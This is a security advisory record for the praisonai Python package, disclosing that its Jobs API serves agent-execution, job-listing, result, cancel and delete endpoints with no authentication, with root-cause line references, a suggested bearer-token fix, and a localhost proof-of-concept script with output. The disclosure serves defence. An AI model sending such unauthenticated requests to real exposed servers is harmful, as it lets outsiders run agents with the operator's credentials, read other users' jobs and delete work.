{"id":"PYSEC-2026-3511","summary":"PraisonAI: Jobs API exposes agent-execution endpoints with no authentication ","details":"# praisonai: Jobs API exposes agent-execution endpoints with no authentication\n\n**Researcher:** Kai Aizen — SnailSploit (@SnailSploit), Adversarial & Offensive Security Research \n**Target:** https://github.com/MervinPraison/PraisonAI\n\n---\n\n**Package:** `praisonai` on PyPI\n**Affected version (empirically tested):** 4.6.48\n**Components:**\n- `praisonai.jobs.server.create_app` — `praisonai/jobs/server.py`\n- `praisonai.jobs.router.create_router` — `praisonai/jobs/router.py`\n- Routes mounted at `/api/v1/runs/...`\n**Weakness:** CWE-306 Missing Authentication for Critical Function · CWE-862 Missing Authorization · CWE-94 Code Injection (via prompt / agent_yaml). \n\n---\n\n## TL;DR\n\n`praisonai` ships a standalone async-jobs HTTP server (`python -m praisonai.jobs.server --host=0.0.0.0 --port=8005`) whose job is to accept job submissions and run agents on the operator's behalf. Every endpoint under `/api/v1/runs` is **unauthenticated**. There is no `auth_token` field, no `Depends(verify_*)`, no middleware that inspects `Authorization` — the CORS middleware *lists* `Authorization` in `allow_headers` (the only signal in the whole module that the developer was aware authentication is a thing), but no route ever reads it.\n\nA network-reachable attacker can:\n\n1. **Execute arbitrary agent code** — `POST /api/v1/runs` accepts `prompt`, `agent_yaml`, `agent_file`, `config`, `framework`. The job is queued and an executor invokes whichever framework (`praisonai` / `crewai` / `autogen`) the attacker picks, with whichever prompt and tool config the attacker supplies. The job runs in the operator's process — same environment variables, same filesystem, same credentials (OpenAI / Anthropic / Azure / Bedrock keys; tool integrations; on-disk YAML recipes).\n2. **List and read every job system-wide** — `GET /api/v1/runs` lists all jobs; `GET /api/v1/runs/{job_id}/result` returns the full result of any completed job. Operator's prompts, the agent's chain-of-thought, tool inputs / outputs, retrieved documents — all readable to an anonymous client.\n3. **Cancel or delete any job** — `POST /…/cancel` and `DELETE /…/{job_id}` accept arbitrary job IDs without any ownership / authorization check.\n4. **Stream live SSE of any in-flight job** — `GET /…/{job_id}/stream` reads the executor's live progress for any job ID.\n\nThe remote-RCE shape (1) is the load-bearing one. Even with `webhook_url` SSRF-guarded (and it is — the model validator at `jobs/models.py:42-65` rejects localhost / private IPs), the attacker needs no callback: SSE streaming returns the agent's output directly on the same connection.\n\n## Root cause\n\n```\n   Expected behavior when starting `praisonai.jobs.server`:\n     \"I'm running an HTTP API my application backend will call.\n      The CORS middleware permits Authorization, so the server\n      enforces it.  Anonymous attackers cannot submit jobs.\"\n\n   Actual behavior (praisonai 4.6.48):\n     - server.py:59-152  create_app builds a FastAPI app, adds\n                         CORSMiddleware, includes the jobs router.\n                         NO auth middleware.  NO global Depends.\n     - router.py:43      @router.post(\"\") submit_job(...)\n                         No Depends, no Authorization header read,\n                         no auth_token config field at all.\n     - router.py:109,148,161,180,205,224  every other route:\n                         likewise, no auth on any of GET-list,\n                         GET-status, GET-result, POST-cancel,\n                         DELETE, GET-stream.\n     - server.py:117     CORS allow_headers DOES include\n                         \"Authorization\" — the only token in the\n                         entire jobs/ subpackage that suggests\n                         the developer was thinking about auth.\n\n   Impact:\n     The API is intended to be production-ready (the CORS code at\n     server.py:96-102 explicitly branches on\n     `os.getenv(\"ENVIRONMENT\") == \"production\"` to harden origins),\n     yet ships with no authentication layer at all.  Operators who\n     bind the server to a network interface — including the\n     suggested `--host=0.0.0.0` in the CLI parser — expose\n     unauthenticated agent execution to anyone who can reach the\n     port.\n```\n\nThe same package gets auth right elsewhere (`praisonai/gateway/server.py` auto-generates an `auth_token` if none is configured and refuses to serve requests without it; `praisonai/endpoints/a2u_server.py:250-264` uses `hmac.compare_digest` on a Bearer token). The jobs API is the outlier.\n\n## Empirically affected routes\n\nVerified by PoC against published `praisonai==4.6.48` (`/api/v1/runs/...` paths):\n\n| Method   | Path                          | Unauth result            |\n|----------|-------------------------------|--------------------------|\n| `POST`   | `/api/v1/runs`                | **HTTP 202 Accepted**, attacker job queued and executor invoked the framework |\n| `GET`    | `/api/v1/runs`                | **HTTP 200**, lists every job in the store |\n| `GET`    | `/api/v1/runs/{job_id}`       | **HTTP 200**, returns status of any job |\n| `GET`    | `/api/v1/runs/{job_id}/result`| (untested; same router, no auth)         |\n| `POST`   | `/api/v1/runs/{job_id}/cancel`| **HTTP 200 / 409** (processed)           |\n| `DELETE` | `/api/v1/runs/{job_id}`       | **HTTP 204 No Content** (deleted)         |\n| `GET`    | `/api/v1/runs/{job_id}/stream`| (untested; SSE; same router, no auth)    |\n\nPoC run log excerpt (`poc/run-log.txt`):\n\n```\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP 202\n    body: {\"job_id\":\"run_90f21c98b82a\",\"status\":\"queued\",...}\n[01:15:44] executor.py:201 ERROR Job failed: run_90f21c98b82a -\n    OPENAI_API_KEY environment variable is required ...\n```\n\nThe executor's error confirms the prompt reached the framework's LLM-invocation step. Had the operator set `OPENAI_API_KEY`, the attacker prompt would have executed.\n\n## Impact details\n\n### 1. Remote code execution via agent invocation\n\n`JobSubmitRequest.framework` accepts `\"praisonai\"`, `\"crewai\"`, or `\"autogen\"`. Each framework can be configured (via the YAML / config the attacker sends) to use arbitrary tools. praisonai's tool loaders (`praisonai/agents_generator.py` `load_tools_from_module*`) have a documented history of arbitrary-import (CVE-2026-40287 and its fix-of-fix CVE-2026-44334). In practice the operator's installation may or may not expose these sinks; either way the attacker controls the prompt, which the LLM will execute with whatever tools the operator wired (including shell, filesystem, browser, …).\n\nThe job executor runs in-process under the operator's service account, with full access to environment variables (LLM API keys, tool tokens) and to anything `praisonai`'s tools normally touch.\n\n### 2. Cross-tenant data read\n\nA single-process deployment uses an `InMemoryJobStore` that is flat — no `user_id` / `tenant_id` / `workspace_id` partition. Any client that knows or guesses a job ID can read it. Worse, the list endpoint (`GET /api/v1/runs`) returns every job, so guessing isn't even necessary.\n\nSensitive content in the result includes the attacker's input (harmless) but also any *legitimate* user's input that the operator's backend submitted — and the agent's full output, which may contain data the agent retrieved from the operator's databases or APIs.\n\n### 3. Denial of service via job deletion / cancellation\n\n`DELETE` and `cancel` accept any job ID. An attacker who polls the list endpoint can enumerate IDs and cancel-then-delete every job in flight, breaking the operator's backend's polling-for-completion flow.\n\n### 4. webhook_url SSRF — defended\n\nTo the developer's credit, `JobSubmitRequest.webhook_url` is validated against localhost / private / link-local / multicast IPs at submission time (`jobs/models.py:42-65`). This blocks the naive \"submit a job whose webhook posts to AWS IMDS\" attack. **Honest yield:** this is properly guarded.\n\n## Anchors\n\npraisonai 4.6.48, source file `praisonai/jobs/server.py` (sha256 `10b5deab96686f276b8ad71fa4712e1e3d301e4c356812d5d0d595b2b9503ef3`):\n\n| Line  | Symbol                                                  | What it shows |\n|-------|---------------------------------------------------------|---------------|\n| 59-152 | `def create_app(cors_origins, store, executor) -\u003e FastAPI:` | Only middleware added is CORS; auth middleware absent. |\n| 117   | `allow_headers=[\"Authorization\", \"Content-Type\", \"Origin\", \"Accept\", \"Idempotency-Key\"]` | CORS hints that the operator should send Authorization — sole indicator the developer considered auth. |\n| 124   | `jobs_router = create_router(get_store, get_executor)` | Router included without `dependencies=[…]`. |\n| 178   | `\"praisonai.jobs.server:create_app\"` (passed to `uvicorn.run`) | Production-ready binding via the CLI / `start_server`. |\n\npraisonai 4.6.48, source file `praisonai/jobs/router.py` (sha256 `869564d523c14624afefb211a2e7c6bf8a27b3356bd19a58927fcb5e1ebb014c`):\n\n| Line  | Symbol                                                              | What it shows |\n|-------|---------------------------------------------------------------------|---------------|\n| 30-31 | `def create_router(store, executor) -\u003e APIRouter:`                  | Sole entry point; no `dependencies=[Depends(...)]`. |\n| 43    | `@router.post(\"\", response_model=JobSubmitResponse, status_code=202)` | submit_job — no auth. |\n| 109   | `@router.get(\"\", response_model=JobListResponse)`                   | list_jobs — no auth. |\n| 148   | `@router.get(\"/{job_id}\", response_model=JobStatusResponse)`        | get_job_status — no auth. |\n| 161   | `@router.get(\"/{job_id}/result\", response_model=JobResultResponse)` | get_job_result — no auth. |\n| 180   | `@router.post(\"/{job_id}/cancel\", response_model=JobStatusResponse)`| cancel_job — no auth. |\n| 205   | `@router.delete(\"/{job_id}\", status_code=204)`                       | delete_job — no auth. |\n| 224   | `@router.get(\"/{job_id}/stream\")`                                    | stream_job (SSE) — no auth. |\n\n## Suggested fix\n\nAdd a single FastAPI dependency that reads an `Authorization: Bearer \u003ctoken\u003e` header and `hmac.compare_digest`s it against an operator-configured secret. Apply it as a global router dependency:\n\n```python\n# praisonai/jobs/auth.py\nimport hmac, os\nfrom fastapi import HTTPException, Header\n\n_TOKEN = os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\")\n\nasync def require_auth(authorization: str | None = Header(None)):\n    if not _TOKEN:\n        raise HTTPException(503, \"PRAISONAI_JOBS_AUTH_TOKEN not configured\")\n    if not authorization or not authorization.startswith(\"Bearer \"):\n        raise HTTPException(401, \"Bearer auth required\")\n    presented = authorization[len(\"Bearer \"):]\n    if not hmac.compare_digest(presented, _TOKEN):\n        raise HTTPException(401, \"invalid token\")\n\n# praisonai/jobs/router.py\ndef create_router(store, executor) -\u003e APIRouter:\n    router = APIRouter(prefix=\"/api/v1/runs\", tags=[\"jobs\"],\n                       dependencies=[Depends(require_auth)])  # \u003c-- single line\n    ...\n```\n\nA startup-time refusal in `create_app` would round it out:\n\n```python\n# praisonai/jobs/server.py:create_app\nif not os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\"):\n    raise RuntimeError(\n        \"PRAISONAI_JOBS_AUTH_TOKEN is required; the jobs API \"\n        \"executes attacker-controllable agent code and must not \"\n        \"run without authentication.\"\n    )\n```\n\nThe pattern is already present in the sibling `praisonai/gateway/server.py` (which auto-generates a random token if none is supplied) — that approach plus a logged warning about the new token would minimize operator friction.\n\n## Steps to reproduce\n\n1. Clone the target: `git clone --depth 1 https://github.com/MervinPraison/PraisonAI`\n2. Run the proof of concept (`poc.py`) against the cloned source.\n3. Observe the result shown under *Verified result* below.\n\n## Proof of concept\n\n`poc.py`\n\n```python\n\"\"\"\nPoC: praisonai Jobs API has zero authentication on agent-execution endpoints.\n\n`praisonai.jobs.server.create_app` builds a FastAPI app and includes\n`praisonai.jobs.router.create_router`, which registers POST/GET/DELETE\nendpoints under `/api/v1/runs/...` — every one of them executes (or\ninspects, cancels, deletes) arbitrary agent jobs.  No route reads any\nAuthorization header; no middleware enforces any auth check.\n\nThis PoC starts the jobs API server in-process via uvicorn, then sends\nunauthenticated requests to each route and reports the outcome.\n\"\"\"\n\nimport json\nimport sys\nimport time\nimport threading\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nimport uvicorn\nfrom praisonai.jobs.server import create_app\n\nPORT = 18005\n\ndef http_request(method, path, body=None, headers=None, timeout=5):\n    url = f\"http://127.0.0.1:{PORT}{path}\"\n    data = None\n    if body is not None:\n        data = json.dumps(body).encode(\"utf-8\")\n    req = Request(url, data=data, method=method, headers=headers or {})\n    if data is not None:\n        req.add_header(\"Content-Type\", \"application/json\")\n    try:\n        with urlopen(req, timeout=timeout) as resp:\n            return resp.status, dict(resp.headers), resp.read().decode(\"utf-8\", errors=\"replace\")\n    except HTTPError as e:\n        return e.code, dict(e.headers), e.read().decode(\"utf-8\", errors=\"replace\")\n    except URLError as e:\n        return None, {}, f\"URLError: {e}\"\n\ndef run_server(app):\n    config = uvicorn.Config(app, host=\"127.0.0.1\", port=PORT, log_level=\"warning\")\n    server = uvicorn.Server(config)\n    import asyncio\n    loop = asyncio.new_event_loop()\n    asyncio.set_event_loop(loop)\n    loop.run_until_complete(server.serve())\n\ndef main() -\u003e int:\n    print(\"=\" * 70)\n    print(\"praisonai version: 4.6.48\")\n    print(\"Test: spin up praisonai.jobs.server in-process, send\")\n    print(\"      UNAUTHENTICATED requests to every /api/v1/runs route.\")\n    print(\"=\" * 70)\n\n    app = create_app()\n    t = threading.Thread(target=run_server, args=(app,), daemon=True)\n    t.start()\n    time.sleep(1.5)\n\n    findings = []\n\n    # 1. POST /api/v1/runs — submit a new job WITHOUT auth.\n    payload = {\n        \"prompt\": \"ATTACKER-CONTROLLED PROMPT — would invoke an agent\",\n        \"framework\": \"praisonai\",\n        \"config\": {\"_attacker_says\": \"no auth required\"},\n        \"timeout\": 5,\n    }\n    code, hdrs, body = http_request(\"POST\", \"/api/v1/runs\", body=payload)\n    print(f\"\\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    print(f\"    body: {body[:300]}\")\n    job_id = None\n    if code == 202:\n        try:\n            job_id = json.loads(body).get(\"job_id\")\n            findings.append(f\"POST /api/v1/runs: 202 Accepted, job_id={job_id!r}\")\n        except Exception:\n            pass\n\n    # 2. GET /api/v1/runs — list ALL jobs system-wide.\n    code, _, body = http_request(\"GET\", \"/api/v1/runs?page=1&page_size=20\")\n    print(f\"\\n[2] GET /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    if code == 200:\n        findings.append(\"GET /api/v1/runs: unauthenticated list of ALL jobs\")\n\n    if job_id:\n        code, _, body = http_request(\"GET\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[3] GET /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n        code, _, body = http_request(\"POST\", f\"/api/v1/runs/{job_id}/cancel\")\n        print(f\"\\n[4] POST /api/v1/runs/{{job_id}}/cancel -\u003e HTTP {code}\")\n        code, _, body = http_request(\"DELETE\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[5] DELETE /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n\n    print(\"\\n\" + \"=\" * 70)\n    if any('POST /api/v1/runs:' in f for f in findings):\n        print(f\"VULNERABLE: {len(findings)} unauthenticated routes confirmed\")\n        for f in findings:\n            print(f\"  - {f}\")\n        print(\"VERDICT: VULNERABLE\")\n        return 0\n    print(\"DEFENDED\")\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n## Verification harness (executed against the cloned repo)\n\nThis drives the unmodified upstream code rather than a reproduction.\n\n```python\nimport sys, types, os\nBK=os.path.abspath(\"repos/PraisonAI/src/praisonai\"); sys.path.insert(0,BK)\nfor p in [\"praisonai\",\"praisonai.jobs\"]:\n    m=types.ModuleType(p); m.__path__=[BK+\"/\"+p.replace(\".\",\"/\")]; sys.modules[p]=m\nimport praisonai.jobs.server as S          # REAL jobs server\napp = S.create_app()                      # REAL FastAPI app\nfrom starlette.testclient import TestClient\nclient = TestClient(app)\nP=\"/api/v1/runs\"\ntests=[(\"GET  list\",   lambda: client.get(P)),\n       (\"POST submit\", lambda: client.post(P, json={\"agents_config\":{\"a\":\"x\"},\"input\":\"hi\"})),\n       (\"GET  status\", lambda: client.get(P+\"/nope\")),\n       (\"GET  result\", lambda: client.get(P+\"/nope/result\")),\n       (\"POST cancel\", lambda: client.post(P+\"/nope/cancel\")),\n       (\"DEL  delete\", lambda: client.delete(P+\"/nope\"))]\ncodes=[]\nfor name,fn in tests:\n    c=fn().status_code; codes.append(c); print(f\"[+] (no auth) {name:12s} {P} -\u003e HTTP {c}\")\nassert all(c not in (401,403) for c in codes), codes\nassert codes[0]==200    # list works unauthenticated\nprint(\"[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API\")\n```\n\n## Verified result\n\nThis PoC was executed against the live upstream code; captured output:\n\n```\n[+] (no auth) GET  list    /api/v1/runs -\u003e HTTP 200\n[+] (no auth) POST submit  /api/v1/runs -\u003e HTTP 422\n[+] (no auth) GET  status  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) GET  result  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) POST cancel  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) DEL  delete  /api/v1/runs -\u003e HTTP 404\n[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API\n```\n\n## Credit\n\nKai Aizen — SnailSploit (@SnailSploit). Adversarial & Offensive Security Research.","aliases":["CVE-2026-57131","GHSA-fq2m-6wqh-x44g"],"modified":"2026-07-23T15:00:17.164115896Z","published":"2026-07-23T11:41:41.788348Z","references":[{"type":"WEB","url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fq2m-6wqh-x44g"},{"type":"PACKAGE","url":"https://github.com/MervinPraison/PraisonAI"},{"type":"PACKAGE","url":"https://pypi.org/project/praisonai"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-fq2m-6wqh-x44g"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-57131"}],"affected":[{"package":{"name":"praisonai","ecosystem":"PyPI","purl":"pkg:pypi/praisonai"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"4.6.59"}]}],"versions":["0.0.1","0.0.10","0.0.11","0.0.12","0.0.13","0.0.14","0.0.15","0.0.16","0.0.17","0.0.18","0.0.19","0.0.2","0.0.20","0.0.21","0.0.22","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.3","0.0.30","0.0.31","0.0.32","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.4","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.5","0.0.50","0.0.52","0.0.53","0.0.54","0.0.55","0.0.56","0.0.57","0.0.58","0.0.59","0.0.59rc11","0.0.59rc2","0.0.59rc3","0.0.59rc5","0.0.59rc6","0.0.59rc7","0.0.59rc8","0.0.59rc9","0.0.6","0.0.61","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.7","0.0.70","0.0.71","0.0.72","0.0.73","0.0.74","0.0.8","0.0.9","0.1.0","0.1.1","0.1.10","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","1.0.0","1.0.1","1.0.10","1.0.11","1.0.2","1.0.3","1.0.4","1.0.5","1.0.6","1.0.8","1.0.9","2.0.0","2.0.1","2.0.10","2.0.11","2.0.12","2.0.13","2.0.14","2.0.15","2.0.16","2.0.17","2.0.18","2.0.19","2.0.2","2.0.20","2.0.22","2.0.23","2.0.24","2.0.25","2.0.26","2.0.27","2.0.28","2.0.29","2.0.3","2.0.30","2.0.31","2.0.32","2.0.33","2.0.34","2.0.35","2.0.36","2.0.37","2.0.38","2.0.39","2.0.40","2.0.41","2.0.42","2.0.43","2.0.44","2.0.45","2.0.46","2.0.47","2.0.48","2.0.49","2.0.5","2.0.50","2.0.51","2.0.53","2.0.54","2.0.55","2.0.56","2.0.57","2.0.58","2.0.59","2.0.6","2.0.60","2.0.61","2.0.62","2.0.63","2.0.64","2.0.65","2.0.66","2.0.67","2.0.68","2.0.69","2.0.7","2.0.70","2.0.71","2.0.72","2.0.73","2.0.74","2.0.75","2.0.76","2.0.77","2.0.78","2.0.79","2.0.8","2.0.80","2.0.81","2.0.9","2.1.0","2.1.1","2.1.4","2.1.5","2.1.6","2.2.1","2.2.10","2.2.11","2.2.12","2.2.13","2.2.14","2.2.15","2.2.16","2.2.17","2.2.18","2.2.19","2.2.2","2.2.20","2.2.21","2.2.22","2.2.24","2.2.25","2.2.26","2.2.27","2.2.28","2.2.29","2.2.3","2.2.30","2.2.31","2.2.32","2.2.33","2.2.34","2.2.35","2.2.36","2.2.37","2.2.38","2.2.39","2.2.4","2.2.40","2.2.41","2.2.42","2.2.43","2.2.44","2.2.45","2.2.46","2.2.47","2.2.48","2.2.49","2.2.5","2.2.50","2.2.51","2.2.52","2.2.53","2.2.54","2.2.55","2.2.56","2.2.57","2.2.58","2.2.59","2.2.6","2.2.60","2.2.61","2.2.62","2.2.63","2.2.64","2.2.65","2.2.66","2.2.67","2.2.68","2.2.69","2.2.7","2.2.70","2.2.71","2.2.72","2.2.73","2.2.74","2.2.75","2.2.76","2.2.77","2.2.78","2.2.79","2.2.8","2.2.80","2.2.81","2.2.82","2.2.83","2.2.84","2.2.86","2.2.87","2.2.88","2.2.89","2.2.9","2.2.90","2.2.91","2.2.93","2.2.95","2.2.96","2.2.97","2.2.98","2.2.99","2.3.0","2.3.1","2.3.10","2.3.11","2.3.12","2.3.13","2.3.14","2.3.15","2.3.16","2.3.18","2.3.19","2.3.2","2.3.20","2.3.21","2.3.22","2.3.23","2.3.24","2.3.25","2.3.26","2.3.27","2.3.28","2.3.29","2.3.3","2.3.30","2.3.31","2.3.32","2.3.33","2.3.34","2.3.35","2.3.36","2.3.37","2.3.38","2.3.39","2.3.4","2.3.40","2.3.41","2.3.42","2.3.43","2.3.44","2.3.45","2.3.46","2.3.47","2.3.48","2.3.49","2.3.5","2.3.50","2.3.51","2.3.52","2.3.53","2.3.54","2.3.55","2.3.56","2.3.57","2.3.58","2.3.59","2.3.6","2.3.60","2.3.61","2.3.62","2.3.63","2.3.64","2.3.65","2.3.66","2.3.67","2.3.68","2.3.69","2.3.7","2.3.70","2.3.71","2.3.72","2.3.73","2.3.74","2.3.75","2.3.76","2.3.77","2.3.78","2.3.79","2.3.8","2.3.80","2.3.81","2.3.82","2.3.83","2.3.84","2.3.85","2.3.86","2.3.87","2.3.9","2.4.0","2.4.1","2.4.2","2.4.3","2.4.4","2.5.0","2.5.1","2.5.2","2.5.3","2.5.4","2.5.5","2.5.6","2.5.7","2.6.0","2.6.1","2.6.2","2.6.3","2.6.4","2.6.5","2.6.6","2.6.7","2.6.8","2.7.0","2.8.3","2.8.4","2.8.5","2.8.6","2.8.7","2.8.8","2.8.9","2.9.0","2.9.1","2.9.2","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.0.5","3.0.6","3.0.7","3.0.8","3.0.9","3.1.0","3.1.1","3.1.2","3.1.3","3.1.4","3.1.5","3.1.6","3.1.7","3.1.8","3.1.9","3.10.0","3.10.1","3.10.10","3.10.11","3.10.12","3.10.13","3.10.14","3.10.15","3.10.16","3.10.17","3.10.18","3.10.19","3.10.2","3.10.20","3.10.21","3.10.22","3.10.23","3.10.24","3.10.25","3.10.26","3.10.27","3.10.3","3.10.4","3.10.5","3.10.6","3.10.7","3.10.8","3.10.9","3.11.0","3.11.1","3.11.10","3.11.11","3.11.12","3.11.13","3.11.14","3.11.2","3.11.3","3.11.4","3.11.8","3.11.9","3.12.0","3.12.1","3.12.2","3.12.3","3.2.0","3.2.1","3.3.0","3.3.1","3.4.0","3.4.1","3.5.0","3.5.1","3.5.2","3.5.3","3.5.4","3.5.5","3.5.6","3.5.7","3.5.8","3.5.9","3.6.0","3.6.1","3.6.2","3.7.0","3.7.1","3.7.2","3.7.3","3.7.4","3.7.5","3.7.6","3.7.7","3.7.8","3.7.9","3.8.0","3.8.1","3.8.10","3.8.11","3.8.12","3.8.13","3.8.14","3.8.16","3.8.17","3.8.18","3.8.19","3.8.2","3.8.20","3.8.21","3.8.22","3.8.3","3.8.4","3.8.5","3.8.6","3.8.7","3.8.8","3.8.9","3.9.0","3.9.1","3.9.10","3.9.11","3.9.12","3.9.13","3.9.14","3.9.15","3.9.16","3.9.17","3.9.18","3.9.19","3.9.2","3.9.20","3.9.21","3.9.22","3.9.23","3.9.24","3.9.25","3.9.26","3.9.27","3.9.28","3.9.29","3.9.3","3.9.30","3.9.31","3.9.32","3.9.33","3.9.34","3.9.35","3.9.4","3.9.5","3.9.6","3.9.7","3.9.8","3.9.9","4.0.0","4.1.0","4.2.0","4.2.1","4.2.2","4.2.3","4.2.4","4.3.0","4.3.1","4.4.0","4.4.10","4.4.11","4.4.12","4.4.2","4.4.3","4.4.4","4.4.5","4.4.6","4.4.7","4.4.8","4.4.9","4.5.0","4.5.1","4.5.10","4.5.100","4.5.101","4.5.102","4.5.103","4.5.104","4.5.105","4.5.106","4.5.107","4.5.108","4.5.109","4.5.11","4.5.110","4.5.111","4.5.112","4.5.113","4.5.114","4.5.115","4.5.117","4.5.118","4.5.119","4.5.12","4.5.120","4.5.121","4.5.122","4.5.123","4.5.124","4.5.125","4.5.126","4.5.127","4.5.128","4.5.129","4.5.13","4.5.130","4.5.131","4.5.132","4.5.133","4.5.134","4.5.135","4.5.136","4.5.137","4.5.139","4.5.14","4.5.140","4.5.143","4.5.144","4.5.145","4.5.149","4.5.15","4.5.16","4.5.18","4.5.19","4.5.2","4.5.20","4.5.21","4.5.22","4.5.23","4.5.24","4.5.25","4.5.26","4.5.27","4.5.28","4.5.29","4.5.3","4.5.30","4.5.31","4.5.32","4.5.33","4.5.34","4.5.35","4.5.36","4.5.37","4.5.38","4.5.39","4.5.40","4.5.41","4.5.42","4.5.43","4.5.44","4.5.45","4.5.46","4.5.48","4.5.49","4.5.5","4.5.51","4.5.52","4.5.54","4.5.55","4.5.56","4.5.57","4.5.58","4.5.59","4.5.6","4.5.60","4.5.62","4.5.63","4.5.64","4.5.65","4.5.67","4.5.68","4.5.69","4.5.7","4.5.70","4.5.71","4.5.72","4.5.73","4.5.74","4.5.76","4.5.77","4.5.78","4.5.79","4.5.8","4.5.80","4.5.81","4.5.82","4.5.83","4.5.85","4.5.87","4.5.88","4.5.89","4.5.9","4.5.90","4.5.93","4.5.94","4.5.95","4.5.96","4.5.97","4.5.98","4.6.10","4.6.11","4.6.12","4.6.13","4.6.14","4.6.15","4.6.16","4.6.18","4.6.19","4.6.20","4.6.21","4.6.22","4.6.23","4.6.24","4.6.25","4.6.26","4.6.27","4.6.28","4.6.29","4.6.30","4.6.31","4.6.32","4.6.33","4.6.34","4.6.35","4.6.36","4.6.37","4.6.38","4.6.39","4.6.40","4.6.41","4.6.42","4.6.43","4.6.44","4.6.45","4.6.46","4.6.47","4.6.48","4.6.50","4.6.51","4.6.52","4.6.53","4.6.54","4.6.55","4.6.56","4.6.57","4.6.58","4.6.9"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/praisonai/PYSEC-2026-3511.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}